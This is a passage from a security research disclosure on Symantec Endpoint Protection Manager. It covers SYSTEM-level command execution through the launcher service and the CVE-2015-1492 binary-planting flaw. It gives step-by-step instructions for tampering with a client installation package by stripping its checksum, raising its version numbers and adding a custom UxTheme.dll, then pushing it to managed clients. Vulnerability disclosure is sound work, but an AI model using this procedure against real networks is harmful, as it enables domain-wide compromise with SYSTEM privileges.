The Symantec Endpoint Protection Launcher executable SemLaunchSvc.exe is running as a service on the SEPM server with 'NT Authority\SYSTEM' privileges. It is used to launch processes that require elevated privileges (e. g., LiveUpdate, ClientRemote, etc.). The service is listening on the loopback port 8447 and SEPM communicates with the service via encrypted messages. The communication endpoint in SEPM is the SemLaunchService class. One of the supported tasks is the CommonCMD, which results in command line parameters of a cmd.exe call.

Since we are able to execute arbitrary Java code within SEPM's web server context, we can effectively execute commands with 'NT Authority\SYSTEM' privileges on the SEPM server.

CVE-2015-1492: SEP Client Binary Planting

The client deployment process on Windows clients is vulnerable to Binary Planting. It is an attack exploiting the behavior of how Windows searches for files of dynamically loaded libraries when loading them via LoadLibrary only by their name. If it is possible for an attacker to place a custom DLL in one of the locations the DLL is searched in, it is possible to execute arbitrary code with the DllMain entry point function, which gets executed automatically on load.

Symantec Endpoint Protection is vulnerable to this flaw: During the installation of a deployment package on a Windows client, the SEP client service ccSvcHst.exe starts the smcinst.exe from the installation package as a service. This service tries to load several DLLs, e. g., the UxTheme.dll.

By deploying a specially crafted client installation package with a custom DLL, it is possible to execute arbitrary code with 'NT Authority\SYSTEM' privileges.

A custom installation package containing a custom DLL can be constructed and deployed in SEPM with the following steps.

Export Package
Download an existing client installation package for Windows as a template:
  • Go to 'Admin', 'Installation Packages'.
  • Select a directory where you want to export it to.
  • Select one of the existing packages for Windows and click on 'Export a Client Installation Package'.
  • Untick the 'Create a single .EXE file for this package'.
  • Untick the 'Export packages with policies from the following groups'.
  • Click 'OK'.
Modify Package
Tamper with the client installation package template:
  • Within the downloaded installation package files, delete the packlist.xml file.
  • Open the setAid.ini file, delete the PackageChecksum line and increase the values of ServerVersion and ClientVersion to something like 12.2.0000 instead of 12.1.5337.
  • Open the Setup.ini file and increase the ProductVersion value accordingly.
  • Copy the custom DLL into the package directory and rename it UxTheme.dll.
Import and deploy Package
Create a new client installation package from the tampered files and deploy it to the clients:
  • Go to 'Admin', 'Installation Packages'.
  • Click 'Add a Client Installation Package'.
  • Give it a name, select the directory of the tampered client installation package files, and upload it.
  • Click 'Upgrade Clients with Package'.
  • Choose the newly created client installation package and the group it should be deployed to.
  • Open the 'Upgrade Settings', untick 'Maintain existing client features when upgrading' and select the default feature set for the target group, e. g., 'Full Protection for Clients'.
  • Upgrade the clients by clicking 'Next'.

The loading of the planted binary may take some while, probably due to some scheduling of the smcinst.exe service.

Conclusion

We have successfully demonstrated that a centralized enterprise management solution like the Symantec Endpoint Protection suite is a critical asset in a corporate network as unauthorized access to the manager can have unforeseen influence on the managed clients. In this case, an exposed Symantec Endpoint Protection Manager can result in the full compromise of a whole corporate domain.

❌
❌